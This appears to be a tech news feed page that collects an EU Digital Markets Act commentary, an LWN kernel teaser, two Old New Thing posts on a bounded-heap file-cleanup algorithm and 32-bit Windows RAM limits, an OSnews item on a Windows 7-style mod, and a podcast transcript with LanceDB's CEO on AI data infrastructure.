Both the underlying data in the EC report and the data Mozilla provides indicate that the Digital Markets Act is having real and tangible effects, for end users, developers, and companies alike. The never-ending barrage of anti-EU and anti-DMA propaganda from Apple, the US government, and their PR attack dogs seems to have been weirdly justified, from the American perspective: basic consumer protection legislation does, indeed, work to lessen the stranglehold major technology companies have on our lives.

And considering just NVIDIA’s market cap alone is now equal to more than 17% of the United States’ GDP, it makes sense the Americans are unhappy with the DMA. That’s going to make one hell of a sound when it pops.

20:35

[$] Policy groups for memory management [LWN.net]

The kernel's control-group subsystem works well for resource management, Chris Li said at the beginning of his memory-management-track session at the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit. Control groups work less well for other use cases, though. He was there to present his proposed enhancement, called "policy groups", that would address some of the shortcomings that he has encountered. A consensus on how this feature should look still seems distant, though.

20:07

A constant-space linear-time algorithm for deleting all but the 10 most recent files in a directory [The Old New Thing]

Say you have a directory full of files, and you want to delete all but the 10 most recent files. Is there a way to tell FindFirstFile to enumerate the files in date order?

No, there is no way to tell FindFirstFile to enumerate the files in date order. The files enumerated by FindFirstFile are produced in whatever order the file system driver wants. For example, FAT typically enumerates them in the order the files appear in the directory listing, which could be in order of creation if the files were added sequentially, or some mishmash order if there were renames or deletions mixed in.

Since you can’t control the order in which the files are enumerated, you’ll have to do the sorting yourself. The naïve solution is to read in all the entries, sort them by last-modified date, and then delete all but the last ten. This is O(n) space and O(n log n) running time.
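As an aside (my own illustrative sketch, not from the original post): the naïve approach translates directly to a few lines of Python, with os.scandir standing in for FindFirstFile and the function name being mine:

```python
import os

def delete_all_but_newest_naive(directory, keep=10):
    # Read in all the entries (files only)...
    entries = [e for e in os.scandir(directory) if e.is_file()]
    # ...sort them by last-modified date, oldest first...
    entries.sort(key=lambda e: e.stat().st_mtime)
    # ...then delete all but the last `keep` (assumes keep >= 1).
    for entry in entries[:-keep]:
        os.remove(entry.path)
```

This is the O(n)-space, O(n log n)-time baseline.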

But you can do better.

This job calls for a priority queue. A priority queue is a data structure that supports these operations, where n is the number of items in the priority queue.

  • Add sorted: O(log n)
  • Find largest: O(1)
  • Remove largest: O(log n)

The above description is for a max-priority queue. There is also a min-priority queue where the final two operations are “find smallest” and “remove smallest”. The two versions are equivalent because you can just use a reverse-sense comparison to switch from one to the other.

What we can do is enumerate all the files and add them one by one to a min-priority queue sorted by modified date. The priority queue holds the newest items. If the priority queue size exceeds 10, then we delete the file corresponding to the “smallest” (earliest) entry in the priority queue, and then remove that entry from the priority queue.

Since the priority queue size has a fixed cap, all of the operations run in O(1) time because the value of n is bounded by a predetermined constant. (Of course, the larger the cap, the larger the constant in O(1).) The overall algorithm then runs in O(n) time, where n is the number of files in the directory.

Here’s a sketch of a solution. To get a min-priority heap, we have to reverse the sense of the comparison in dateAscending.

constexpr int files_to_keep = 10;

auto dateAscending = [](const WIN32_FIND_DATA& a, const WIN32_FIND_DATA& b) {
    return CompareFileTime(&a.ftLastWriteTime, &b.ftLastWriteTime) > 0;
};

std::priority_queue<WIN32_FIND_DATA,
        std::vector<WIN32_FIND_DATA>, decltype(dateAscending)>
        names(dateAscending);

WIN32_FIND_DATA wfd;
wil::unique_hfind findHandle( FindFirstFileW(L"*.*", &wfd));
if (findHandle.is_valid())
{
    do
    {
        if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
            // Skip directories
            continue;
        }

        names.push(wfd);
        if (names.size() > files_to_keep) {
            DeleteFileW(names.top().cFileName);
            names.pop();
        }
    } while (FindNextFileW(findHandle.get(), &wfd));
}

It’s unfortunate that std::priority_queue doesn’t have a deduction guide that deduces the Comparator. We have to specify it explicitly, and since it comes after the Container, we have to write out the container type manually instead of allowing it to be deduced.

It’s also unfortunate that it’s hard to call reserve() on the vector hiding inside the priority_queue. This means that the names.push() could throw an exception. At least we use an RAII type (wil::unique_hfind) to ensure that the find handle is not leaked.

If you have access to std::inplace_vector, you could use a

std::priority_queue<WIN32_FIND_DATA,
        std::inplace_vector<WIN32_FIND_DATA, files_to_keep + 1>,
        decltype(dateAscending)> names(dateAscending);

to avoid memory allocations entirely. (It also makes it clearer that the algorithm is constant-space.)

This is an example of a so-called online algorithm, an algorithm that does its work incrementally rather than requiring all of the input before it can start working.
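For readers who would rather see the online version outside of Win32, here is an illustrative Python rendering of the same bounded-heap idea (my own sketch, not from the original post; heapq is a min-heap already, so no comparator reversal is needed):

```python
import heapq
import os

def delete_all_but_newest(directory, keep=10):
    # Min-heap keyed on mtime: the root is always the oldest of the
    # candidates currently held, and the heap never grows past `keep`.
    heap = []  # (mtime, path) tuples
    for entry in os.scandir(directory):
        if not entry.is_file():
            continue  # skip directories, mirroring the C++ sketch
        heapq.heappush(heap, (entry.stat().st_mtime, entry.path))
        if len(heap) > keep:
            # The heap root is the oldest candidate: delete that file
            # and drop its entry, restoring the size cap.
            _, oldest = heapq.heappop(heap)
            os.remove(oldest)
```

Space is O(keep) and each push/pop is O(log keep), i.e. O(1) for a fixed cap, matching the analysis above.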

Exercise: What if the task was to delete the 10 oldest files?

The post A constant-space linear-time algorithm for deleting all but the 10 most recent files in a directory appeared first on The Old New Thing.

Why do Windows client editions on 32-bit x86 systems artificially limit RAM to 4 GB? [The Old New Thing]

Windows XP SP 2 introduced Data Execution Prevention (DEP), which takes advantage of a then-new feature of x86-class processors that allowed you to deny execution from data pages. The new feature was Physical Address Extensions (PAE) which also allowed those 32-bit processors to access physical RAM above the 4 GB boundary. Although you could turn on Data Execution Prevention on all systems, only server products would use the memory above 4 GB.

A reader asked, “What was the real reason client editions were prevented from using more than 4 GB of RAM?”

The use of the word “real” in the question implies that the reader believed that the official reason was a lie, and there was some nefarious evil reason for the limitation. It’s unclear what this nefarious reason would be. Maybe the reader thought the “real” reason was “To force users to buy copies of Windows Server, which is far more lucrative”, though that doesn’t make sense. The cheapest version of Windows Server 2003 32-bit edition that supported more than 4 GB of RAM was Enterprise Edition, which sold for $3,999.¹ This is an outrageous price for a consumer operating system.

The reason why consumer products don’t use RAM above 4 GB is explained in the documentation that accompanied the introduction of the feature under “Driver issues”.

Typically, device drivers must be modified in a number of small ways. Although the actual code changes may be small, they can be difficult. This is because when not using PAE memory addressing, it is possible for a device driver to assume that physical addresses and 32-bit virtual address limits are identical. PAE memory makes this assumption untrue.

[M]any device drivers designed for these systems may not have been tested on system configurations with PAE enabled. In order to limit the impact to device driver compatibility, changes to the hardware abstraction layer (HAL) were made to Windows XP SP2 and Windows Server 2003 SP1 Standard Edition to limit physical address space to 4 GB.

As explained above, memory above 4 GB was not enabled for compatibility reasons. Many drivers inadvertently assume that all physical addresses fit in 32 bits (DMA drivers, for example). Those drivers would corrupt memory if memory above 4 GB were made available.
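To make the truncation failure concrete, here is a hypothetical sketch (my own, not real driver code): a driver that squeezes a 64-bit physical address into a 32-bit field silently wraps any address above the 4 GB boundary onto an unrelated page below it:

```python
def to_dma_register_32(phys_addr):
    # Hypothetical buggy driver path: the hardware register (or the
    # driver's bookkeeping field) is only 32 bits wide, so the high
    # bits of the physical address are silently discarded.
    return phys_addr & 0xFFFFFFFF

below_4gb = 0x0000_0000_1234_5000   # fits in 32 bits: round-trips fine
above_4gb = 0x0000_0001_1234_5000   # a page above the 4 GB boundary

assert to_dma_register_32(below_4gb) == below_4gb
# Above 4 GB, the address wraps to an unrelated page below 4 GB --
# the device would read or write someone else's memory.
assert to_dma_register_32(above_4gb) == 0x1234_5000
assert to_dma_register_32(above_4gb) != above_4gb
```

The truncated transfer then lands on whatever happens to live at the low address, which is exactly the memory corruption described above.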

Memory above 4 GB is enabled on server because if you are a server administrator, you don’t install random drivers for that hand-held scanner you bought at Best Buy from the bargain bin for $10. Server administrators typically run only the plain vanilla drivers that come with Windows. (They don’t even install manufacturer video drivers.) All the drivers that come with Windows have been tested for addresses above 4 GB. That 2001 driver for the $10 handheld scanner has not, and there’s a good chance that it will truncate addresses above 4 GB and corrupt memory as a result.

The consumer market and the server market are very different in terms of usage pattern. Consumers will install practically anything. Server administrators install as little as possible. Consumers have no technical expertise. Server administrators have access to highly-skilled staff.

Of course, this is all now a historical oddity. Systems with only 4 GB of RAM are vanishingly rare, and Microsoft began discouraging the production of systems using 32-bit processors in 2020, finally ending the production of 32-bit editions entirely with Windows 11.

¹ The only other version that supported more than 4 GB of RAM was Datacenter Edition, and on the pricing sheet I found, they didn’t even bother listing the price. If you have to ask, you can’t afford it.

The post Why do Windows client editions on 32-bit x86 systems artificially limit RAM to 4 GB? appeared first on The Old New Thing.

19:21

Classic 7 combines Windows 7’s Aero Glass with Windows 10 [OSnews]

Interest in classic user interface design is spiking, and today we’ve got another great example, highlighted yesterday by Michael MJD. Classic 7 combines Windows 10 LTSC with a whole slew of themes and deep modifications to deliver Windows 10, but made to look, feel, and even act like Windows 7.

Classic 7 is a Windows 10 (IoT Enterprise LTSC 2021) modification made to look 1:1 to Windows 7. It has all of the goodies that Windows 7 had along with some extras included! Classic 7 features a 1:1 OOBE recreation, meaning it’ll feel just like your PC simplified once more.

↫ Classic 7 website

As Michael MJD’s video shows, this is much more than a mere theme, and extends far deeper into the operating system than these kinds of projects generally do. I have no idea how stable this really is, or if it’s even remotely legal to do something like this, but who the hell cares – this is incredibly fun, and seems quite well done.

18:28

Generative AI in the Real World: Chang She on Data Infrastructure for AI [Radar]

As a pandas core contributor and early Parquet adopter who built AI data pipelines at streaming company Tubi TV, Chang She saw firsthand why the traditional data stack breaks down for AI workloads—and founded LanceDB to fix it. Chang joined Ben Lorica to explain why vector databases are too narrow a solution for modern AI data needs, and what a true multimodal data infrastructure actually looks like. Chang and Ben get into why the Lance file format is quickly becoming the open source standard for multimodal data, how the rise of agents is exploding data infrastructure demands, why open-weight models are the enterprise cost shift to watch in the next 12 months, and more. “Trillion is the new billion,” Chang says, and the enterprises that set up their data infrastructure now for that scale will be the ones that succeed.

About the Generative AI in the Real World podcast: In 2023, ChatGPT put AI on everyone’s agenda. In 2026, the challenge will be turning those agendas into reality. In Generative AI in the Real World, Ben Lorica interviews leaders who are building with AI. Learn from their experience to help put AI to work in your enterprise.

Check out other episodes of this podcast on the O’Reilly learning platform or follow us on YouTube, Spotify, Apple, or wherever you get your podcasts.

Transcript

This transcript was created with the help of AI and has been lightly edited for clarity.

00.35
All right, so today we have Chang She, CEO and cofounder of LanceDB, which you can find at lancedb.com. Tagline is “Build better models faster.” So Chang, welcome to the podcast.

00.49
Hey Ben, super excited to be here.

00.52
All right, we’ll jump into the core topics, but a bit of a background there for our listeners who may not be familiar with you. You worked on pandas—you were a core member of the pandas team. You were very early on with Parquet as well. And at some point, you became convinced that for AI workloads, these former tools that you worked on—Parquet, pandas—were not enough. So what was the moment of realization for you that these traditional tools that were foundational for analytics were lacking?

01.33
Absolutely. So I worked at a company called Tubi TV, which was video on-demand and streaming. So movies and TV. And it was there that I ended up dealing with a lot of I guess what I would call AI data. So we had to have embeddings for personalization, video assets, image assets, audio, text for subtitles and all of those things. All of those did not really fit into the traditional data stack—you know, pandas, Spark, Parquet, and even Arrow. So that was sort of the inspiration for me to start LanceDB.

02.15
And Chang, at this point, do you think that more people are aware of this disconnect between those tools and the kinds of tools they’ll need moving forward?

02.30
When I talk to data infrastructure folks who are building and managing that stack for dealing with this kind of data, there’s broad recognition that something has to be done, that the existing stack is just not sufficient to deal with this data. And what’s more interesting is that this data is also becoming a lot more valuable because of AI.

02.52
So obviously, before you came on the scene, there was this wave of vector stores or vector databases which were optimized for retrieval. So let’s say I’m a listener and all I have is text. Do I need anything beyond the vector database?

03.17
Even if you just have text and you just have text embeddings, the creation of those embeddings and then the management of all of those data assets—your metadata, the actual documents, how to serve that—a lot of that falls outside the purview of a vector database. The vector databases tend to be very narrow solutions for a very narrow problem, whereas something like LanceDB takes a broader view of, “When you have AI data, what are all the things you need to do to it throughout that life cycle of application development or model development? And how do we build a tool and a system that allows you to simplify your life by having one system to do all of the major workloads throughout that life cycle?”

04.13
And by the way, for our listeners, there’s LanceDB and then there’s the open Lance file format, and I wanna ask you about this file format in a second, but you mentioned something about vector databases and you were kind of saying that, you know, they’re not great at creating the embeddings. But Chang, the vector database people, they never really positioned themselves as responsible for creating the embeddings, right? So they just assume that you’ll show up with embeddings.

04.47
That’s right. But even if you take that narrow view, what we find in enterprises today is a lot of folks have an offline generation process in the data lake itself, where they chunk up the documents, then they generate the embeddings, then they have what they call an offline store, then they have to copy-paste that data into a vector database for serving. So there’s a lot of data syncing [and] data movement, so it creates expense and there’s a lot of complexity.

And so that’s the. . . Even for just text-based workloads, even just for pure vector search, that tends to be a big pain point. And then two is vector databases, a lot of times, don’t pay as much attention to the overall retrieval stack, right? If you remember, the task for users is I want to find the right data in my dataset, and vector search is just one technique. You have many different kinds of techniques, full-text search, or even just outside of search. You might have SQL queries that you want to run, filters, regexes, all of that goes into a rich and very accurate retrieval process. And vector databases, in general, do not expand beyond just that simple semantic or vector search.
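As a toy illustration of that broader retrieval stack (my own sketch, not LanceDB’s API; the document set and two-dimensional “embeddings” are made up): an exact keyword filter narrows the candidates first, and vector similarity then ranks what survives:

```python
import math

def cosine(a, b):
    # Cosine similarity between two equal-length vectors.
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(x * x for x in b))
    return dot / (na * nb)

def retrieve(docs, query_vec, keyword=None, top_k=2):
    # Filter first (cheap, exact), then rank the survivors by
    # vector similarity (semantic).
    candidates = [d for d in docs if keyword is None or keyword in d["text"]]
    candidates.sort(key=lambda d: cosine(d["vec"], query_vec), reverse=True)
    return [d["text"] for d in candidates[:top_k]]

docs = [
    {"text": "debian release notes", "vec": [1.0, 0.0]},
    {"text": "gpu training tips",    "vec": [0.0, 1.0]},
    {"text": "debian gpu drivers",   "vec": [0.1, 0.9]},
]
# Keyword filter removes "gpu training tips"; similarity ranks the rest.
print(retrieve(docs, [0.0, 1.0], keyword="debian", top_k=1))
```

The point of the transcript stands: a production system combines several such techniques (full-text search, SQL filters, regexes, vector search) rather than relying on semantic search alone.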

06.10
So I mentioned the Lance open file format, which. . . I guess the shortcut that people use is like Parquet for AI, but it’s actually both a file and table format. So maybe give our listeners, Chang, a high-level description of the Lance format and why it’s become so popular.

06.33
Lance is what we call a lakehouse format. It is quickly becoming the new open source standard for multimodal data. And what I mean by a lakehouse format is that it spans a couple of different layers. So you mentioned in the beginning a file format. So this is the equivalent in the stack to Parquet, where we would talk about “How do we lay out the data in a particular file?” And at this layer, the innovation in Lance is that it is really, really good for random access without sacrificing any scan speed. And our files are actually smaller than Parquet for many AI datasets.

The next layer is usually what we call a table format that is occupied by projects like Iceberg and Delta and Hudi today. And [the] Lance format comes in at this layer. We have much better designs, more optimizations for machine learning experimentation, so doing backfills easily, doing two-dimensional data evolution, being able to handle really large blob data like videos and images, and then just being able to do a branching strategy that supports true sort of Git for data semantics that takes the best of Parquet and Iceberg. 

And then finally, there’s a third layer, which is about indexing so that you can have fast scans, fast searches, fast queries. So when you put all that together, that’s what we call the Lance lakehouse format.

08.11
I described Lance as open. Can you kind of clarify what that means, because I actually don’t know?

08.19
Number one is Lance format is open source. It’s Apache 2.0 license. You can find it on our GitHub. We have community governance; [we] have PMCs that are from lots of external contributors. And then I think beyond that, there’s open source and there’s open source, right? I think what Lance format is designed for is a true open architecture as well. So not only is it open source; it also plays really well into the rest of the data ecosystem. 

So for example, when people compare us to Parquet and Iceberg, well, we’re not designed as a head-to-head competitor with Parquet and Iceberg. We will slot into the same Polaris data catalog, or you can have one unified view on all of your datasets, but then under the hood it can be Parquet/Iceberg for BI data and Lance for your AI data. And then Lance itself plugs in natively to Spark and pandas and Polars and DuckDB and any sort of open data tooling that you’re already used to.

09.31
So operationally then, Chang, if I’m a data architect, should I think of Lance as, “OK, so I have Parquet and these table formats like Delta and Iceberg for my structured data. And then if it’s nonstructured, which could mean video, audio, and also text, right? So then I have to bring in this other format, Lance.” Is that operationally what happens in practice?

10.07
Yeah, often what the data infra folks and data engineers we talk to interact with is the tooling, right? So they’re looking at their data pipelines, they’re looking at maybe their Spark jobs or their search applications, and then those are the jobs that actually interact with the underlying storage, for example. And so instead of. . . 

And that data transfer process is actually really easy through Apache Arrow. And most of the time, it’s really just one line of code change. It’s the same Spark code, for example. Instead of writing to Parquet, you’re writing to Lance. And it simplifies your overall data pipeline by bringing all of your tabular data and metadata along with your multimodal data all in the same place and also embeddings.

11.05
And then in terms of workload, you alluded to the fact that the previous-generation vector stores excelled at something very specific, maybe retrieval. So is Lance equally specialized in the sense that, “All right, Lance is great for X, and X might be, I don’t know, analytics, but it doesn’t excel in other things”? Describe the kinds of workloads that teams using Lance are running.

11.39
So very high-level, the summary is LanceDB, our enterprise data platform, excels at helping our customers manage really large-scale AI data. So embeddings for search, adding new features and extracting new columns, enriching their dataset, doing data curation and exploration, and then feeding that to GPUs really quickly for distributed training jobs so that they can get as high GPU utilization and as high FLOPs utilization as they can.

12.20
You’ve used the word multimodal a few times, and I’ve always been a proponent of people really making sure that their data infrastructure is positioned for this multimodal world. But sometimes I question this assumption in the following sense, right? Is multimodality a Bay Area bubble thing? In other words, if I go to the East Coast and talk to, I don’t know, Goldman Sachs or an insurance company, are they still grappling with legacy systems that are mostly structured data? What they want to do is be able to do all this fancy AI stuff now with agents, but still using the old-school data that they have.

13.12
I think when we talk about multimodal data, a lot of times what comes to mind first is video generation, image generation, all of those. Self-driving cars. . . So there’s a lot of high-tech, cutting-edge applications that are multimodal. But I think if you look at more traditional enterprises, they already have a lot of multimodal data. 

So you just mentioned insurance: They have millions of documents and PDFs and contracts lying around. Insurers especially will have top-down views of houses and property boundaries so that they can assess risk a little bit better. The way I think about it is, before AI, it was just really hard to get value out of that data, so they haven’t paid as much attention to it.

So it’s kind of like when I clean up my house: What I like to do is move all the mess into a back room or storage so I don’t have to think about it, right? My wife yells at me all the time; she opens up the storage and everything falls out. I feel like that’s what traditional enterprises have done with multimodal data: They didn’t know what to do with it, so they stuck it in some directory in SharePoint or something like that and just left it there. But there’s actually a tremendous amount of value in it, and AI is helping them unlock all of that. So I think in the next few years especially, we’re going to see a lot more attention paid to “If we can get a lot more value out of this data, how do we actually manage it? How do we work with it? And how do we combine it with the rest of our data stack so that it’s governed within a single entity?”

15.06
The hot thing a few years ago in data infrastructure was the lakehouse, right? Great term we introduced. [laughs]

15.18
I wonder who came up with that one. [laughs]

15.22
Yeah. So you folks are starting to use the term multimodal lakehouse. The term lakehouse is, I think, now widely used, right? And now you’re introducing the multimodal lakehouse. So where is the multimodal lakehouse already mature, and where does it still need some work?

15.50
Just for the audience who’s not as familiar, the really simplified way I think about a lakehouse is this: You have all your data in one place in the data lake, and then you have a data warehousing layer on top that provides structure, tables, and structured ways to run workloads on all of that data.

Now, we think about the multimodal lakehouse in a couple of different ways. One, the data changes: You go from purely tabular data, or maybe clickstream data, to all sorts of multimodal data, from embeddings to all of your multimedia types. That changes a lot about how you can read and write data efficiently, how you manage it, and how you synchronize it with metadata.

Number two is the workloads also are multimodal. You’re not just thinking about running SQL and analytics workloads. You’re now thinking about search. Now you’re thinking about training. Now you’re thinking about feature engineering and “How does your lakehouse interact with GPU clusters?” and all of those things that traditional lakehouses are not very good at.

And then I think the third layer where the meaning of “multimodal” comes in is that traditional lakehouses tend to be good only at batch offline processing. If you want to do serving, online processing, you probably need to introduce a sort of OLTP database or some system that’s primarily for serving. Well, with LanceDB, because of the innovations in the format, you can actually do both at the same time. So the online-offline scenario can also become multimodal in this sense.

17.44
So if I understand what you’re saying, you’re multimodal in multiple senses: multimodal data types, multimodal workloads, and multimodal kinds of operations. Right now, in the Databricks world (I don’t think they use the word multimodal), if anything they go back to that HTAP kind of thing, a hybrid transactional/analytical processing engine. Through an acquisition, they’re now very good at Postgres; I forget what they call it. [Chang: A lakebase.] So they have the transactions, and they have the analytics. What you’re saying is that your vision of the multimodal lakehouse has that hybrid transactional-analytics capability, multimodal types of data, and multimodal workloads. Is that a fair summation? Surely, Chang, certain aspects of what you just described are more fleshed out than others, right? So what areas do you anticipate you folks will be working hard on, in terms of these multiple notions of multimodality?

19.16
Number one is actually scale. Scale has been the biggest driving factor late last year and this year, and a lot of that has been the rise of agents. Because of agents, data volume, query throughput, and performance and latency requirements have all just exploded. That’s the thing we find we’re uniquely suited for, and something we’re pushing on a lot. Oftentimes when we talk to customers, what we really think is that a trillion is the new billion. We have folks who are probably operating at a thousand times the scale they were just a year or two ago.

20.22
I guess the hack that people will do for some of these things, Chang, is just “Let’s put the files in S3 and then use a database somehow.” Are you still seeing a lot of people try to do this?

20.39
Yeah, I mean, I think there are a few attempts at doing that. And there’s a general trend, because of the data scale: Object storage is really the only cost-effective and scalable storage backend for a lot of these newer data storage systems. I think where the challenge lies for data infrastructure providers is “How do you actually get scalability and high performance while maintaining the cost advantages of S3 and object storage?” That is the difficult challenge. We actually have a recent blog article talking about how we do that at 10-billion-vector scale.

At smaller scales, that’s actually really easy: You just slurp up all the data from S3 into some caching system and serve it from there, in any in-memory system. That’s a really easy problem, and there are tons of open source projects, Lance for example, that can help you do that pretty effectively. The challenge is really at scale. If you have 10 billion vectors, pretty much your only cost-effective option is to store them on object storage. Then, you know, imagine the query times if you were just targeting S3 directly. So indexing and search and caching all become a big distributed systems problem. That’s what we solve.

22.16
Like you said, many data engineering and data infrastructure teams are trying to think through “What does our infrastructure look like in a world of agents?” right? So imagine (this isn’t happening yet) the equivalent of OpenClaw in the enterprise, where a single employee might have 10 of these AI delegates or AI assistants. Some of the things that come up: One, identity management and access control. Two, maybe some of these AI delegates don’t really need anything permanent; they just want something ephemeral. Stand up a LanceDB for a minute and then make it go away. Are these some of the things that you are starting to think about?

23.14
Yeah, for our cutting-edge customers, that’s already the reality. We specialize a lot in infrastructure for model training, for example. So think about features: A researcher might say, “Hey, I have a feature idea. There are two input features, each with 10 variants, and then I have some output feature that combines the two.” Well, now I’ve got 100 different variants. Before, there was a limited number of variants I could test manually as an individual researcher; now I can use agents to run all of that automatically and just go to sleep while it runs. Well, now humans can go to sleep, but the agents are putting a lot of load on the underlying data infrastructure. This year we’re talking about going from hundreds of queries per second for plain RAG a couple of years ago to a hundred thousand queries per second in this land of agents.
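The combinatorics here can be made concrete with a few lines of plain Python (the feature names below are purely illustrative, not from any real pipeline):

```python
from itertools import product

# Two hypothetical input features, each with 10 variants (names illustrative).
feature_a_variants = [f"a_v{i}" for i in range(10)]
feature_b_variants = [f"b_v{i}" for i in range(10)]

# Every combination of the two input features is a candidate output feature
# that an agent could evaluate overnight.
candidate_features = [
    f"combine({a}, {b})" for a, b in product(feature_a_variants, feature_b_variants)
]

print(len(candidate_features))  # 10 x 10 = 100 variants to evaluate
```

Each agent-run evaluation of one of these 100 candidates turns into queries against the underlying data infrastructure, which is where the load Chang describes comes from.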

And then when it comes to security and compliance, there’s a lot of churn in the stack around sandboxing and ephemeral systems. And when we talk about object storage, this is actually an even bigger challenge, right? If your source of truth is on the object store, that’s actually the only way you can make this ephemeral workload work out well: When you have hot data, you cache it, you serve it for a time, and then it can go away. The cache can expire it to be replaced by the next hot workload. And you can do that without having to pay for really expensive memory and NVMe for all of your data.
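The hot-data pattern described here, cache on first read, serve for a while, let entries expire to make room for the next workload, can be sketched as a toy read-through cache with a time-to-live. This is a generic illustration in plain Python, not LanceDB’s implementation:

```python
import time

class TTLCache:
    """Toy read-through cache in front of a slow 'object store' (a dict here)."""

    def __init__(self, backing_store, ttl_seconds, clock=time.monotonic):
        self.store = backing_store  # stand-in for S3/object storage
        self.ttl = ttl_seconds
        self.clock = clock
        self._entries = {}          # key -> (value, expiry_time)

    def get(self, key):
        now = self.clock()
        hit = self._entries.get(key)
        if hit is not None and hit[1] > now:
            return hit[0]                        # served from the "hot" cache
        value = self.store[key]                  # slow path: fetch from the store
        self._entries[key] = (value, now + self.ttl)
        return value

# Usage: first read takes the slow path, later reads within the TTL are hot.
store = {"embedding:42": [0.1, 0.2]}
cache = TTLCache(store, ttl_seconds=60)
print(cache.get("embedding:42"))
```

Because the source of truth stays on the backing store, expired entries can simply be dropped; nothing has to be written back, which is what makes the ephemeral workload cheap.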

25.04
So the other thing, Chang, that comes up with agents right now, the hot thing that it seems like a gazillion people are working on, is this notion of memory. So I guess my question to you is: If I have a bunch of agents, and then I have a multimodal lakehouse. . . I have a lakehouse and now I have memories. So I have three different systems that I have to maintain. What’s your take on agent memory?

25.42
LanceDB open source is actually the main memory plug-in for OpenClaw and a number of other agent frameworks, CrewAI for example. For a lot of these agent frameworks and harnesses, there are a couple of requirements. Number one is just being lightweight and super easy to use. LanceDB is the only one that supports hybrid search, reranking, and all these fairly sophisticated retrieval mechanisms without your having to maintain a service.
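As background on the kind of hybrid search and reranking mentioned here: One common way to fuse a vector-similarity ranking with a keyword ranking is reciprocal rank fusion (RRF). The sketch below is a generic, self-contained illustration of that technique, not LanceDB’s actual code:

```python
def rrf_fuse(rankings, k=60):
    """Reciprocal rank fusion: combine several ranked lists of doc ids.

    Each document's score is the sum over lists of 1 / (k + rank), so a
    document that ranks well in *either* the vector or the keyword list
    floats toward the top of the fused result.
    """
    scores = {}
    for ranked in rankings:
        for rank, doc_id in enumerate(ranked, start=1):
            scores[doc_id] = scores.get(doc_id, 0.0) + 1.0 / (k + rank)
    return sorted(scores, key=scores.get, reverse=True)

# Hypothetical results from a vector index and a keyword (BM25-style) index:
vector_hits = ["doc3", "doc1", "doc7"]
keyword_hits = ["doc1", "doc9", "doc3"]
print(rrf_fuse([vector_hits, keyword_hits]))
```

The appeal for embedded use is that this whole step is a pure function over two ranked lists; no separate reranking service is required.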

26.20
Before you continue. . . All right, so this notion of lightweight, right? On the one hand there’s the notion of the multimodal lakehouse, and a lakehouse is never lightweight, right? But then it seems like you folks are also positioning yourselves in the very lightweight DuckDB/SQLite world. Can you clarify what you mean by lightweight when you are supposedly a lakehouse?

26.49
So what I mean by lightweight here is that, from an agent’s perspective, it simplifies a lot of things if you don’t have to connect to another service and talk to another system in order to get access to your memory and retrieve from it. That’s what I mean. So the open source, the. . .

27.15
But then you’re large-scale infrastructure. . . So then if I’m a lightweight agent, how can you. . . This is where I guess I’m a bit confused. Can you clarify: Why am I bringing along a big piece of infrastructure if I’m a lightweight agent?

27.37
Right. LanceDB open source is actually very lightweight; there’s no heavy infrastructure involved. This is why it’s perfect for memory, because a lot of times memory is very ephemeral. You just interact with a session, and when that session is gone, you don’t need to retain all of that. At most you might want to compress some of it and retain it for downstream historical processing, but most of the time it’s just gone; you don’t have to think about it. So that’s what I mean by lightweight. So there’s a version of that.

And then for large-scale retrieval, you have a large historical corpus. If you’re working in a corporate environment, if you have an agent that’s searching through patent history or something like that, that’s where the infrastructure comes in. If I have a petabyte of data out there that I need to search through, the embedded library is not going to cut it. You need a scalable system out there, but it needs to be easy to use. And from the agent’s perspective, it’s the same interface, so it’s just as easy, but there is a scalable system for that large amount of data hidden beneath the surface.

I think for agents, that’s sort of just one of the requirements. The other one is having more sophisticated retrieval so that agents can find what they’re looking for. And different agents will want to look for data in different ways. So being able to support all of that without having like a million different plug-ins to do each modality, I think that’s also something very important for agents as well.

29.28
By the way, I was playing devil’s advocate there, because I actually use LanceDB every day on my laptop. It can be something you use on your laptop, just in-memory.

29.42
Yeah. I think what we find is that when you make it really easy for agents to use, that’s when scale really takes off. The way we’re looking at it, agents are kind of like an ideal gas: If you make it easy for them, then no matter how much compute, data, and infrastructure you have, agents will expand to fill all of it, right? So what we’ve seen is. . . We talked about growth in query throughput. And then because of complex agents, there’s pressure on latency: Your agents want hundred-millisecond or even 20-millisecond latencies now. And we also see a lot of proliferation of data.

One of the largest users of LanceDB told us they’re now managing something like a billion tables, just because they have so many agents and so much data that they have that number of tables within their system. Along any computational and data management dimension you can think of, agents will expand to however much capacity you give them.

30.59
So this is a two-part question. Our listeners may not be aware, but for some reason LanceDB blew up a little more during the launch of OpenClaw. So my two questions are: One, how did the OpenClaw community land on Lance? And two, have you heard back from them about what they liked about Lance?

31.32
Yeah, I mean, a lot of that is what we just talked about: It’s lightweight; it’s easy for the model to use.

31.39
But how did it happen? How did they land on Lance? Do you know?

31.43
So my recollection is that originally it was a recommendation from Claude or something like that. And I think [Lance] was the only one out there that met the requirements: embedded, lightweight, with sophisticated retrieval. And it can run in-memory, on local NVMe, and also on object store.

32.11
Interesting. So since then, has this kind of marriage [with OpenClaw] continued?

32.20
Yeah, we continue to see engagement from the open source community, and our open source continues to grow. I think at the latest count we’re at around 14 million downloads a month across our open source projects, and we’re super excited about working with and supporting the open source community. What we see now is demand for a more filesystem-like interface; a lot of times it’s easier for agents to interact with a filesystem interface.

Now, I’m choosing my words carefully: I don’t mean a filesystem, just a filesystem-like interface. This is something we’re looking into, trying to see what it would look like to put a filesystem interface over LanceDB or the Lance format. Based on the usage patterns we see from agents, this is fairly straightforward to do. So if you’re listening and this sounds interesting, we’d love to have early users come check it out and test it with us.
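To make the idea of a filesystem-like interface concrete, here is one toy sketch of what a path-style read interface over tables could look like. Everything here, the class name, the path scheme, the in-memory tables, is hypothetical; it is not the interface being described in the conversation:

```python
class TableFS:
    """Toy path-style read interface over in-memory 'tables' (nested dicts).

    Paths look like /<table>/<row_key>/<column>. Purely illustrative: the
    point is that agents get familiar read/list semantics without there
    being a real filesystem underneath.
    """

    def __init__(self, tables):
        self.tables = tables  # {table_name: {row_key: {column: value}}}

    def read(self, path):
        table, row_key, column = path.strip("/").split("/")
        return self.tables[table][row_key][column]

    def listdir(self, path=""):
        parts = [p for p in path.strip("/").split("/") if p]
        node = self.tables
        for part in parts:
            node = node[part]
        return sorted(node)

# Usage: reading a "file" is just a lookup into the table.
fs = TableFS({"docs": {"42": {"title": "hello", "body": "world"}}})
print(fs.read("/docs/42/title"))
print(fs.listdir("/docs"))
```

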